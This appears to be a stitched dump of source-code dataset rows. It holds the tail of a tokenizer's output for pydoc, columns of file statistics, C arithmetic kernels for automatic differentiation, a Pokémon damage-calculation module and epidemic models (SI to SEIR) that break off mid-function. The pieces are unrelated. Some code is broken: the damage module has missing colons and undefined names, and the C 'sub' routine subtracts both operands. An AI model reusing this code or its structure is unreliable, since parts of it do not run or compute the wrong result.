woosh.Token(woosh.NAME, 'try', 2807, 12, 2807, 15),
woosh.Token(woosh.OP, ':', 2807, 15, 2807, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2807, 16, 2808, 0),
woosh.Token(woosh.INDENT, ' ', 2808, 0, 2808, 16),
woosh.Token(woosh.NAME, 'if', 2808, 16, 2808, 18),
woosh.Token(woosh.NAME, 'ispath', 2808, 19, 2808, 25),
woosh.Token(woosh.OP, '(', 2808, 25, 2808, 26),
woosh.Token(woosh.NAME, 'arg', 2808, 26, 2808, 29),
woosh.Token(woosh.OP, ')', 2808, 29, 2808, 30),
woosh.Token(woosh.NAME, 'and', 2808, 31, 2808, 34),
woosh.Token(woosh.NAME, 'os', 2808, 35, 2808, 37),
woosh.Token(woosh.OP, '.', 2808, 37, 2808, 38),
woosh.Token(woosh.NAME, 'path', 2808, 38, 2808, 42),
woosh.Token(woosh.OP, '.', 2808, 42, 2808, 43),
woosh.Token(woosh.NAME, 'isfile', 2808, 43, 2808, 49),
woosh.Token(woosh.OP, '(', 2808, 49, 2808, 50),
woosh.Token(woosh.NAME, 'arg', 2808, 50, 2808, 53),
woosh.Token(woosh.OP, ')', 2808, 53, 2808, 54),
woosh.Token(woosh.OP, ':', 2808, 54, 2808, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2808, 55, 2809, 0),
woosh.Token(woosh.INDENT, ' ', 2809, 0, 2809, 20),
woosh.Token(woosh.NAME, 'arg', 2809, 20, 2809, 23),
woosh.Token(woosh.OP, '=', 2809, 24, 2809, 25),
woosh.Token(woosh.NAME, 'importfile', 2809, 26, 2809, 36),
woosh.Token(woosh.OP, '(', 2809, 36, 2809, 37),
woosh.Token(woosh.NAME, 'arg', 2809, 37, 2809, 40),
woosh.Token(woosh.OP, ')', 2809, 40, 2809, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2809, 41, 2810, 0),
woosh.Token(woosh.DEDENT, ' ', 2810, 0, 2810, 16),
woosh.Token(woosh.NAME, 'if', 2810, 16, 2810, 18),
woosh.Token(woosh.NAME, 'writing', 2810, 19, 2810, 26),
woosh.Token(woosh.OP, ':', 2810, 26, 2810, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2810, 27, 2811, 0),
woosh.Token(woosh.INDENT, ' ', 2811, 0, 2811, 20),
woosh.Token(woosh.NAME, 'if', 2811, 20, 2811, 22),
woosh.Token(woosh.NAME, 'ispath', 2811, 23, 2811, 29),
woosh.Token(woosh.OP, '(', 2811, 29, 2811, 30),
woosh.Token(woosh.NAME, 'arg', 2811, 30, 2811, 33),
woosh.Token(woosh.OP, ')', 2811, 33, 2811, 34),
woosh.Token(woosh.NAME, 'and', 2811, 35, 2811, 38),
woosh.Token(woosh.NAME, 'os', 2811, 39, 2811, 41),
woosh.Token(woosh.OP, '.', 2811, 41, 2811, 42),
woosh.Token(woosh.NAME, 'path', 2811, 42, 2811, 46),
woosh.Token(woosh.OP, '.', 2811, 46, 2811, 47),
woosh.Token(woosh.NAME, 'isdir', 2811, 47, 2811, 52),
woosh.Token(woosh.OP, '(', 2811, 52, 2811, 53),
woosh.Token(woosh.NAME, 'arg', 2811, 53, 2811, 56),
woosh.Token(woosh.OP, ')', 2811, 56, 2811, 57),
woosh.Token(woosh.OP, ':', 2811, 57, 2811, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2811, 58, 2812, 0),
woosh.Token(woosh.INDENT, ' ', 2812, 0, 2812, 24),
woosh.Token(woosh.NAME, 'writedocs', 2812, 24, 2812, 33),
woosh.Token(woosh.OP, '(', 2812, 33, 2812, 34),
woosh.Token(woosh.NAME, 'arg', 2812, 34, 2812, 37),
woosh.Token(woosh.OP, ')', 2812, 37, 2812, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2812, 38, 2813, 0),
woosh.Token(woosh.DEDENT, ' ', 2813, 0, 2813, 20),
woosh.Token(woosh.NAME, 'else', 2813, 20, 2813, 24),
woosh.Token(woosh.OP, ':', 2813, 24, 2813, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2813, 25, 2814, 0),
woosh.Token(woosh.INDENT, ' ', 2814, 0, 2814, 24),
woosh.Token(woosh.NAME, 'writedoc', 2814, 24, 2814, 32),
woosh.Token(woosh.OP, '(', 2814, 32, 2814, 33),
woosh.Token(woosh.NAME, 'arg', 2814, 33, 2814, 36),
woosh.Token(woosh.OP, ')', 2814, 36, 2814, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2814, 37, 2815, 0),
woosh.Token(woosh.DEDENT, ' ', 2815, 0, 2815, 16),
woosh.Token(woosh.DEDENT, '', 2815, 16, 2815, 16),
woosh.Token(woosh.NAME, 'else', 2815, 16, 2815, 20),
woosh.Token(woosh.OP, ':', 2815, 20, 2815, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2815, 21, 2816, 0),
woosh.Token(woosh.INDENT, ' ', 2816, 0, 2816, 20),
woosh.Token(woosh.NAME, 'help', 2816, 20, 2816, 24),
woosh.Token(woosh.OP, '.', 2816, 24, 2816, 25),
woosh.Token(woosh.NAME, 'help', 2816, 25, 2816, 29),
woosh.Token(woosh.OP, '(', 2816, 29, 2816, 30),
woosh.Token(woosh.NAME, 'arg', 2816, 30, 2816, 33),
woosh.Token(woosh.OP, ')', 2816, 33, 2816, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2816, 34, 2817, 0),
woosh.Token(woosh.DEDENT, ' ', 2817, 0, 2817, 12),
woosh.Token(woosh.DEDENT, '', 2817, 12, 2817, 12),
woosh.Token(woosh.NAME, 'except', 2817, 12, 2817, 18),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 2817, 19, 2817, 36),
woosh.Token(woosh.NAME, 'as', 2817, 37, 2817, 39),
woosh.Token(woosh.NAME, 'value', 2817, 40, 2817, 45),
woosh.Token(woosh.OP, ':', 2817, 45, 2817, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2817, 46, 2818, 0),
woosh.Token(woosh.INDENT, ' ', 2818, 0, 2818, 16),
woosh.Token(woosh.NAME, 'print', 2818, 16, 2818, 21),
woosh.Token(woosh.OP, '(', 2818, 21, 2818, 22),
woosh.Token(woosh.NAME, 'value', 2818, 22, 2818, 27),
woosh.Token(woosh.OP, ')', 2818, 27, 2818, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2818, 28, 2819, 0),
woosh.Token(woosh.DEDENT, ' ', 2820, 0, 2820, 4),
woosh.Token(woosh.DEDENT, '', 2820, 4, 2820, 4),
woosh.Token(woosh.DEDENT, '', 2820, 4, 2820, 4),
woosh.Token(woosh.NAME, 'except', 2820, 4, 2820, 10),
woosh.Token(woosh.OP, '(', 2820, 11, 2820, 12),
woosh.Token(woosh.NAME, 'getopt', 2820, 12, 2820, 18),
woosh.Token(woosh.OP, '.', 2820, 18, 2820, 19),
woosh.Token(woosh.NAME, 'error', 2820, 19, 2820, 24),
woosh.Token(woosh.OP, ',', 2820, 24, 2820, 25),
woosh.Token(woosh.NAME, 'BadUsage', 2820, 26, 2820, 34),
woosh.Token(woosh.OP, ')', 2820, 34, 2820, 35),
woosh.Token(woosh.OP, ':', 2820, 35, 2820, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2820, 36, 2821, 0),
woosh.Token(woosh.INDENT, ' ', 2821, 0, 2821, 8),
woosh.Token(woosh.NAME, 'cmd', 2821, 8, 2821, 11),
woosh.Token(woosh.OP, '=', 2821, 12, 2821, 13),
woosh.Token(woosh.NAME, 'os', 2821, 14, 2821, 16),
woosh.Token(woosh.OP, '.', 2821, 16, 2821, 17),
woosh.Token(woosh.NAME, 'path', 2821, 17, 2821, 21),
woosh.Token(woosh.OP, '.', 2821, 21, 2821, 22),
woosh.Token(woosh.NAME, 'splitext', 2821, 22, 2821, 30),
woosh.Token(woosh.OP, '(', 2821, 30, 2821, 31),
woosh.Token(woosh.NAME, 'os', 2821, 31, 2821, 33),
woosh.Token(woosh.OP, '.', 2821, 33, 2821, 34),
woosh.Token(woosh.NAME, 'path', 2821, 34, 2821, 38),
woosh.Token(woosh.OP, '.', 2821, 38, 2821, 39),
woosh.Token(woosh.NAME, 'basename', 2821, 39, 2821, 47),
woosh.Token(woosh.OP, '(', 2821, 47, 2821, 48),
woosh.Token(woosh.NAME, 'sys', 2821, 48, 2821, 51),
woosh.Token(woosh.OP, '.', 2821, 51, 2821, 52),
woosh.Token(woosh.NAME, 'argv', 2821, 52, 2821, 56),
woosh.Token(woosh.OP, '[', 2821, 56, 2821, 57),
woosh.Token(woosh.NUMBER, '0', 2821, 57, 2821, 58),
woosh.Token(woosh.OP, ']', 2821, 58, 2821, 59),
woosh.Token(woosh.OP, ')', 2821, 59, 2821, 60),
woosh.Token(woosh.OP, ')', 2821, 60, 2821, 61),
woosh.Token(woosh.OP, '[', 2821, 61, 2821, 62),
woosh.Token(woosh.NUMBER, '0', 2821, 62, 2821, 63),
woosh.Token(woosh.OP, ']', 2821, 63, 2821, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 2821, 64, 2822, 0),
woosh.Token(woosh.NAME, 'print', 2822, 8, 2822, 13),
woosh.Token(woosh.OP, '(', 2822, 13, 2822, 14),
woosh.Token(woosh.STRING, '"""pydoc - the Python documentation tool\r\n\r\n{cmd} <name> ...\r\n Show text documentation on something. <name> may be the name of a\r\n Python keyword, topic, function, module, or package, or a dotted\r\n reference to a class or function within a module or module in a\r\n package. If <name> contains a \'{sep}\', it is used as the path to a\r\n Python source file to document. If name is \'keywords\', \'topics\',\r\n or \'modules\', a listing of these things is displayed.\r\n\r\n{cmd} -k <keyword>\r\n Search for a keyword in the synopsis lines of all available modules.\r\n\r\n{cmd} -n <hostname>\r\n Start an HTTP server with the given hostname (default: localhost).\r\n\r\n{cmd} -p <port>\r\n Start an HTTP server on the given port on the local machine. Port\r\n number 0 can be used to get an arbitrary unused port.\r\n\r\n{cmd} -b\r\n Start an HTTP server on an arbitrary unused port and open a Web browser\r\n to interactively browse documentation. This option can be used in\r\n combination with -n and/or -p.\r\n\r\n{cmd} -w <name> ...\r\n Write out the HTML documentation for a module to a file in the current\r\n directory. If <name> contains a \'{sep}\', it is treated as a filename; if\r\n it names a directory, documentation is written for all the contents.\r\n"""', 2822, 14, 2851, 3),
woosh.Token(woosh.OP, '.', 2851, 3, 2851, 4),
woosh.Token(woosh.NAME, 'format', 2851, 4, 2851, 10),
woosh.Token(woosh.OP, '(', 2851, 10, 2851, 11),
woosh.Token(woosh.NAME, 'cmd', 2851, 11, 2851, 14),
woosh.Token(woosh.OP, '=', 2851, 14, 2851, 15),
woosh.Token(woosh.NAME, 'cmd', 2851, 15, 2851, 18),
woosh.Token(woosh.OP, ',', 2851, 18, 2851, 19),
woosh.Token(woosh.NAME, 'sep', 2851, 20, 2851, 23),
woosh.Token(woosh.OP, '=', 2851, 23, 2851, 24),
woosh.Token(woosh.NAME, 'os', 2851, 24, 2851, 26),
woosh.Token(woosh.OP, '.', 2851, 26, 2851, 27),
woosh.Token(woosh.NAME, 'sep', 2851, 27, 2851, 30),
woosh.Token(woosh.OP, ')', 2851, 30, 2851, 31),
woosh.Token(woosh.OP, ')', 2851, 31, 2851, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2851, 32, 2852, 0),
woosh.Token(woosh.DEDENT, '', 2853, 0, 2853, 0),
woosh.Token(woosh.DEDENT, '', 2853, 0, 2853, 0),
woosh.Token(woosh.NAME, 'if', 2853, 0, 2853, 2),
woosh.Token(woosh.NAME, '__name__', 2853, 3, 2853, 11),
woosh.Token(woosh.OP, '==', 2853, 12, 2853, 14),
woosh.Token(woosh.STRING, "'__main__'", 2853, 15, 2853, 25),
woosh.Token(woosh.OP, ':', 2853, 25, 2853, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2853, 26, 2854, 0),
woosh.Token(woosh.INDENT, ' ', 2854, 0, 2854, 4),
woosh.Token(woosh.NAME, 'cli', 2854, 4, 2854, 7),
woosh.Token(woosh.OP, '(', 2854, 7, 2854, 8),
woosh.Token(woosh.OP, ')', 2854, 8, 2854, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 2854, 9, 2855, 0),
woosh.Token(woosh.DEDENT, '', 2855, 0, 2855, 0),
woosh.Token(woosh.EOF, '', 2855, 0, 2855, 0),
]
| 52.988853
| 2,077
| 0.6252
| 168,575
| 1,007,795
| 3.730452
| 0.024102
| 0.301975
| 0.452962
| 0.202234
| 0.750174
| 0.323979
| 0.104042
| 0.01927
| 0.015255
| 0.0142
| 0
| 0.237117
| 0.130165
| 1,007,795
| 19,018
| 2,078
| 52.99164
| 0.480258
| 0.000079
| 0
| 0.005156
| 1
| 0.094649
| 0.646608
| 0.268575
| 0
| 0
| 0.000012
| 0
| 0.000368
| 1
| 0.000158
| false
| 0.000894
| 0.005314
| 0.000105
| 0.005577
| 0.000789
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a747ab7116c8759ba34c325a9e1343f7b3b285a7
| 5,298
|
py
|
Python
|
experimental/c_implementations.py
|
arthus701/algopy
|
1e2430f803289bbaed6bbdff6c28f98d7767835c
|
[
"Unlicense"
] | 54
|
2015-03-05T13:38:08.000Z
|
2021-11-29T11:54:48.000Z
|
experimental/c_implementations.py
|
arthus701/algopy
|
1e2430f803289bbaed6bbdff6c28f98d7767835c
|
[
"Unlicense"
] | 7
|
2016-04-06T11:25:00.000Z
|
2020-11-09T13:53:20.000Z
|
experimental/c_implementations.py
|
arthus701/algopy
|
1e2430f803289bbaed6bbdff6c28f98d7767835c
|
[
"Unlicense"
] | 13
|
2015-01-17T17:05:56.000Z
|
2021-08-05T01:13:16.000Z
|
import instant
c_code_adouble__imul__ = """
void mul( int tmp_lhs, double *lhs, int Ndim_lhs, int * Dims_lhs, double *lhs_tc, double rhs, int Ndim_rhs, int * Dims_rhs, double *rhs_tc){
if(Ndim_lhs == 1){
const int D = Dims_lhs[0];
const int E = Dims_rhs[0];
for(int d=D-1; d >= 0; --d){
lhs_tc[d] *= rhs;
const int e = (0<=d-E)*(d-E);
for(int k = e; k < d; ++k){
lhs_tc[d] += lhs_tc[k] * rhs_tc[d-1-e-k];
}
if(d<E){
lhs_tc[d] += lhs[0] * rhs_tc[d];
}
}
lhs[0]*= rhs;
}
else if(Ndim_lhs == 2){
const int D = Dims_lhs[0];
const int E = Dims_rhs[0];
const int Ndir = Dims_lhs[1];
for(int d=D-1; d >= 0; --d){
for(int n = 0; n != Ndir; ++n){
lhs_tc[d*Ndir + n] *= rhs;
}
const int e = (0<=d-E)*(d-E);
for(int k = e; k < d; ++k){
for(int n = 0; n != Ndir; ++n){
lhs_tc[d*Ndir+n] += lhs_tc[k*Ndir + n] * rhs_tc[(d-1-e-k)*Ndir+n];
}
}
if(d<E){
for(int n = 0; n != Ndir; ++n){
lhs_tc[d*Ndir+n] += lhs[0] * rhs_tc[d*Ndir+n];
}
}
}
lhs[0]*= rhs;
}
}
"""
c_code_adouble__add__ = """
void add(int Ndim_lhs, int * Dims_lhs, double *lhs, int Ndim_rhs, int * Dims_rhs, double *rhs, int Ndim_result, int * Dims_result, double *result){
if(Ndim_lhs == 2){
const int D = Dims_lhs[0];
const int Ndir = Dims_lhs[1];
for(int d=0; d != D; ++d){
for(int n=0; n != Ndir; ++n){
result[d*Ndir + n] += lhs[d*Ndir+n];
result[d*Ndir + n] += rhs[d*Ndir+n];
}
}
}
else{
const int D = Dims_lhs[0];
for(int d=0; d != D; ++d){
result[d] += lhs[d];
result[d] += rhs[d];
}
}
}
"""
c_code_adouble__sub__ = """
void sub(int Ndim_lhs, int * Dims_lhs, double *lhs, int Ndim_rhs, int * Dims_rhs, double *rhs, int Ndim_result, int * Dims_result, double *result){
if(Ndim_lhs == 2){
const int D = Dims_lhs[0];
const int Ndir = Dims_lhs[1];
for(int d=0; d != D; ++d){
for(int n=0; n != Ndir; ++n){
result[d*Ndir + n] -= lhs[d*Ndir+n];
result[d*Ndir + n] -= rhs[d*Ndir+n];
}
}
}
else{
const int D = Dims_lhs[0];
for(int d=0; d != D; ++d){
result[d] -= lhs[d];
result[d] -= rhs[d];
}
}
}
"""
c_code_adouble__mul__ = """
void mul(int Ndim_lhs, int * Dims_lhs, double *lhs, int Ndim_rhs, int * Dims_rhs, double *rhs, int Ndim_result, int * Dims_result, double *result){
if(Ndim_lhs == 2){
const int D = Dims_lhs[0];
const int Ndir = Dims_lhs[1];
for(int d=0; d != D; ++d){
for(int k = 0; k != d; ++k){
for(int n=0; n != Ndir; ++n){
result[d*Ndir + n] += lhs[k*Ndir+n] * rhs[(d-k)*Ndir+n];
}
}
}
}
else{
const int D = Dims_lhs[0];
for(int d=0; d != D; ++d){
for(int k = 0; k <= d; ++k){
result[d] += lhs[k] * rhs[d-k];
}
}
}
}
"""
c_code_adouble__div__ = """
void div(int Ndim_lhs, int * Dims_lhs, double *lhs, int Ndim_rhs, int * Dims_rhs, double *rhs, int Ndim_result, int * Dims_result, double *result){
if(Ndim_lhs == 2){
const int D = Dims_lhs[0];
const int Ndir = Dims_lhs[1];
for(int d=0; d != D; ++d){
for(int n=0; n != Ndir; ++n){
result[d*Ndir+n]+=lhs[d*Ndir+n];
}
for(int k=0; k!=d; ++k){
for(int n=0; n != Ndir; ++n){
result[d*Ndir + n] -= result[k*Ndir + n]*rhs[(d-k)*Ndir + n];
}
}
for(int n=0; n != Ndir; ++n){
result[d*Ndir + n] /= rhs[0+n];
}
}
}
else{
const int D = Dims_lhs[0];
for(int d=0; d != D; ++d){
result[d]+=lhs[d];
for(int k=0; k!=d; ++k){
result[d] -= result[k]*rhs[d-k];
}
result[d] /= rhs[0];
}
}
}
"""
adouble__add__ = instant.inline_with_numpy(c_code_adouble__add__, arrays=[['Ndim_lhs', 'Dims_lhs', 'lhs'], ['Ndim_rhs', 'Dims_rhs', 'rhs'], ['Ndim_result', 'Dims_result', 'result']] )
adouble__sub__ = instant.inline_with_numpy(c_code_adouble__sub__, arrays=[['Ndim_lhs', 'Dims_lhs', 'lhs'], ['Ndim_rhs', 'Dims_rhs', 'rhs'], ['Ndim_result', 'Dims_result', 'result']] )
adouble__mul__ = instant.inline_with_numpy(c_code_adouble__mul__, arrays=[['Ndim_lhs', 'Dims_lhs', 'lhs'], ['Ndim_rhs', 'Dims_rhs', 'rhs'], ['Ndim_result', 'Dims_result', 'result']] )
adouble__div__ = instant.inline_with_numpy(c_code_adouble__div__, arrays=[['Ndim_lhs', 'Dims_lhs', 'lhs'], ['Ndim_rhs', 'Dims_rhs', 'rhs'], ['Ndim_result', 'Dims_result', 'result']] )
adouble__imul__ = instant.inline_with_numpy(c_code_adouble__imul__, arrays=[['tmp_lhs','lhs'],['Ndim_lhs', 'Dims_lhs', 'lhs_tc'], ['Ndim_rhs', 'Dims_rhs', 'rhs_tc']] )
| 34.180645
| 183
| 0.469234
| 790
| 5,298
| 2.910127
| 0.04557
| 0.069595
| 0.044367
| 0.056546
| 0.881688
| 0.85298
| 0.84515
| 0.761635
| 0.717268
| 0.717268
| 0
| 0.0167
| 0.34447
| 5,298
| 154
| 184
| 34.402597
| 0.645263
| 0
| 0
| 0.447552
| 0
| 0.062937
| 0.855228
| 0.010759
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006993
| 0
| 0.006993
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a787b8c723436b3dd5f85a394d89275d6c7179db
| 2,465
|
py
|
Python
|
pokebot/models/estimator/damage_formula.py
|
nacharya114/pokebot
|
b9028c86c5ee58178f348c75c39225f7b55507aa
|
[
"MIT"
] | 1
|
2020-05-20T04:52:24.000Z
|
2020-05-20T04:52:24.000Z
|
pokebot/models/estimator/damage_formula.py
|
nacharya114/pokebot
|
b9028c86c5ee58178f348c75c39225f7b55507aa
|
[
"MIT"
] | null | null | null |
pokebot/models/estimator/damage_formula.py
|
nacharya114/pokebot
|
b9028c86c5ee58178f348c75c39225f7b55507aa
|
[
"MIT"
] | null | null | null |
import numpy as np
from numpy.random import rand
import poke_env as penv
from poke_env.environment.battle import Battle
from poke_env.environment.pokemon import Pokemon
from poke_env.environment.move import Move
from poke_env.environment.move_category import MoveCategory
from poke_env.environment.pokemon_type import PokemonType
def calcDamage(activePokemon,oppActivePokemon, moveUsed)
activeMonTypes = activePokemon.types
oppActiveMonTypes = oppActivePokemon.types
level = activePokemon.level;
weather = 1;
burn = 1;
moveCategory = moveUsed.category;
activeMonStats = activePokemon.stats
oppActiveMonStats = oppActivePokemon.stats
if moveCategory == MoveCategory.PHYSICAL:
A = activeMonStats["Atk"];
D = oppActiveMonStats["Def"]
elif moveCategory == MoveCategory.SPECIAL:
A = activeMonStats["SpA"];
D = oppActiveMonStats["SpD"]
power = moveUsed.base_power;
moveType = moveUsed.type;
STAB = 1;
if np.any(moveTyping == activeMonTypes[i] for i in range(len(activeMonTypes)) ):
STAB = 1.5;
targets = 1;
critical = 1;
random = (1 - 0.85)*rand(1) + 0.85;
# random = 1;
other = 1;
damageMultiplier = moveUsed.type.damage_multiplier(oppActivePokemon.type_1, oppActivePokemon.type_2)
modifier = targets * weather * critical*random*STAB*damageMultiplier*burn*other;
damage = np.floor( (((((2*level/5) +2) * power * A/D)/50) + 2) * modifier);
return damage
def calcDamage_model(activePokemon,oppActivePokemon, A,D, moveUsed)
activeMonTypes = activePokemon.types
oppActiveMonTypes = oppActivePokemon.types
level = activePokemon.level;
weather = 1;
burn = 1;
moveCategory = moveUsed.category;
activeMonStats = activePokemon.stats
if moveCategory == MoveCategory.PHYSICAL
A = activeMonStats["Atk"];
D = oppActiveMonStats["Def"]
elif moveCategory == MoveCategory.SPECIAL
A = activeMonStats["SpA"];
D = oppActiveMonStats["SpD"]
power = moveUsed.base_power;
moveType = moveUsed.type;
STAB = 1;
if np.any(moveTyping == activeMonTypes[i] for i in range(len(activeMonTypes)) ):
STAB = 1.5;
targets = 1;
critical = 1;
random = (1 - 0.85)*rand(1) + 0.85;
# random = 1;
other = 1;
damageMultiplier = moveUsed.type.damage_multiplier(oppActivePokemon.type_1, oppActivePokemon.type_2)
modifier = targets * weather * critical*random*STAB*damageMultiplier*burn*other;
damage = np.floor( (((((2*level/5) +2) * power * A/D)/50) + 2) * modifier);
return damage
| 21.25
| 101
| 0.727383
| 295
| 2,465
| 6.020339
| 0.230508
| 0.023649
| 0.030968
| 0.061937
| 0.835023
| 0.773086
| 0.773086
| 0.773086
| 0.773086
| 0.773086
| 0
| 0.024108
| 0.158621
| 2,465
| 115
| 102
| 21.434783
| 0.832208
| 0.009331
| 0
| 0.761905
| 0
| 0
| 0.00984
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.126984
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a79ba78ba77c07cc2743ff50d997e886c35cc706
| 8,278
|
py
|
Python
|
Differential Equation/epidemic.py
|
FinCreWorld/Mathematical-Modeling-with-Python
|
d5206309bce32f2aa64fe94ab4e8a576add0e628
|
[
"MIT"
] | null | null | null |
Differential Equation/epidemic.py
|
FinCreWorld/Mathematical-Modeling-with-Python
|
d5206309bce32f2aa64fe94ab4e8a576add0e628
|
[
"MIT"
] | 1
|
2021-08-21T09:36:54.000Z
|
2021-08-21T09:36:54.000Z
|
Differential Equation/epidemic.py
|
FinCreWorld/Mathematical-Modeling-with-Python
|
d5206309bce32f2aa64fe94ab4e8a576add0e628
|
[
"MIT"
] | 3
|
2021-08-21T09:25:22.000Z
|
2021-08-29T12:04:49.000Z
|
import numpy as np
from scipy.integrate import solve_ivp
import matplotlib.pyplot as plt
class SI:
"""
Only consider susceptibles and infectives.
Infectives can't recover.
"""
def __init__(self,
N: int,
r: int,
beta: float,
I0: int) -> None:
"""
:param N: total population, fixed
:param r: number of contacts per person per time
:param beta: probability of disease transmission in a contact
:param I0: initial infectives population
"""
self.N = N
self.r = r
self.beta = beta
self.I0 = I0
def predict(self, t: np.ndarray) -> np.ndarray:
return self.N * self.I0 / (self.I0 + (self.N - self.I0) * np.exp(-self.r*self.beta*t))
def show(self, t_begin: float, t_end: float) -> None:
fig, ax = plt.subplots(1, 1)
ax.set_title('SI Model\n' +
r'$r=%d,\,\beta=%.6f$' % (self.r, self.beta))
ax.set_xlabel('Time')
ax.set_ylabel('Fraction')
ax.set_xlim(t_begin, t_end)
ax.set_ylim(0, 1)
plot_x = np.linspace(t_begin, t_end, 100)
plot_I = self.predict(plot_x)
plot_S = self.N - plot_I
ax.plot(plot_x, plot_I / self.N, label='Infectives')
ax.plot(plot_x, plot_S / self.N, label='Susceptibles')
plt.legend()
plt.show()
class SIS:
"""
Only consider susceptibles and infectives.
Infectives can recover and may be infected again.
"""
def __init__(self,
N: int,
r: int,
beta: float,
gamma: float,
I0: int) -> None:
"""
:param N: total population, fixed
:param r: number of contacts per person per time
:param beta: probability of disease transmission in a contact
:param gamma: probability of recovery
:param I0: initial infectives population
"""
self.N = N
self.r = r
self.beta = beta
self.gamma = gamma
self.I0 = I0
def predict(self, t: np.ndarray) -> np.ndarray:
rbg = self.r * self.beta - self.gamma
Nrbg = self.N * rbg / (self.r * self.beta)
return Nrbg / (1 + (Nrbg / self.I0 - 1) * np.exp(-rbg * t))
def show(self, t_begin: float, t_end: float) -> None:
fig, ax = plt.subplots(1, 1)
ax.set_title('SIS Model\n' +
r'$r=%d,\,\beta=%.6f,\,\gamma=%.6f$' % (self.r, self.beta, self.gamma))
ax.set_xlabel('Time')
ax.set_ylabel('Fraction')
ax.set_xlim(t_begin, t_end)
ax.set_ylim(0, 1)
plot_x = np.linspace(t_begin, t_end, 100)
plot_I = self.predict(plot_x)
plot_S = self.N - plot_I
ax.plot(plot_x, plot_I / self.N, label='Infectives')
ax.plot(plot_x, plot_S / self.N, label='Susceptibles')
plt.legend()
plt.show()
class SIR:
"""
Consider susceptibles, infectives and removed.
Infectives can recover and won't be infected again.
"""
def __init__(self,
N: int,
r: int,
beta: float,
gamma: float,
I0: int,
R0: int) -> None:
"""
:param N: total population, fixed
:param r: number of contacts per person per time
:param beta: probability of disease transmission in a contact
:param gamma: probability of recovery
:param I0: initial infectives population
:param R0: initial removed population
"""
self.N = N
self.r = r
self.beta = beta
self.gamma = gamma
self.I0 = I0
self.R0 = R0
def predict(self, t: np.ndarray) -> np.ndarray:
def fun(_, y):
""" y = [S, I, R] """
return np.array([-self.r * self.beta * y[1] * y[0] / self.N,
self.r * self.beta * y[1] * y[0] / self.N - self.gamma * y[1],
self.gamma * y[1]])
res = solve_ivp(fun=fun,
t_span=(0, np.max(t)),
y0=np.array([self.N - self.I0 - self.R0, self.I0, self.R0]),
method='RK45',
t_eval=t)
return res.y
def show(self, t_begin: float, t_end: float) -> None:
fig, ax = plt.subplots(1, 1)
ax.set_title('SIR Model\n' +
r'$r=%d,\,\beta=%.6f,\,\gamma=%.6f$' % (self.r, self.beta, self.gamma))
ax.set_xlabel('Time')
ax.set_ylabel('Fraction')
ax.set_xlim(t_begin, t_end)
ax.set_ylim(0, 1)
plot_x = np.linspace(t_begin, t_end, 100)
plot_S = self.predict(plot_x)
plot_S, plot_I, plot_R = plot_S[0], plot_S[1], plot_S[2]
ax.plot(plot_x, plot_I / self.N, label='Infectives')
ax.plot(plot_x, plot_S / self.N, label='Susceptibles')
ax.plot(plot_x, plot_R / self.N, label='Removed')
plt.legend()
plt.show()
class SEIR:
"""
Consider susceptibles, exposed, infectives and removed.
Infectives can recover and won't be infected again.
Exposed cannot infect others.
"""
def __init__(self,
N: int,
r: int,
beta: float,
sigma: float,
gamma: float,
E0: int,
I0: int,
R0: int) -> None:
"""
:param N: total population, fixed
:param r: number of contacts per person per time
:param beta: probability of disease transmission in a contact
:param sigma: probability of exposed -> infectives
:param gamma: probability of recovery
:param E0: initial exposed population
:param I0: initial infectives population
:param R0: initial removed population
"""
self.N = N
self.r = r
self.beta = beta
self.sigma = sigma
self.gamma = gamma
self.E0 = E0
self.I0 = I0
self.R0 = R0
self.S0 = self.N - E0 - I0 - R0
def predict(self, t: np.ndarray) -> np.ndarray:
def fun(_, y):
""" y = [S, E, I, R] """
return np.array([-self.r * self.beta * y[2] * y[0] / self.N,
self.r * self.beta * y[2] * y[0] / self.N - self.sigma * y[1],
self.sigma * y[1] - self.gamma * y[2],
self.gamma * y[2]])
res = solve_ivp(fun=fun,
t_span=(0, np.max(t)),
y0=np.array([self.S0, self.E0, self.I0, self.R0]),
method='RK45',
t_eval=t)
return res.y
def show(self, t_begin: float, t_end: float) -> None:
fig, ax = plt.subplots(1, 1)
ax.set_title('SEIR Model\n' +
r'$r=%d,\,\beta=%.6f,\,\sigma=%.6f,\,\gamma=%.6f$' % (self.r, self.beta, self.sigma, self.gamma))
ax.set_xlabel('Time')
ax.set_ylabel('Fraction')
ax.set_xlim(t_begin, t_end)
ax.set_ylim(0, 1)
plot_x = np.linspace(t_begin, t_end, 100)
plot_S = self.predict(plot_x)
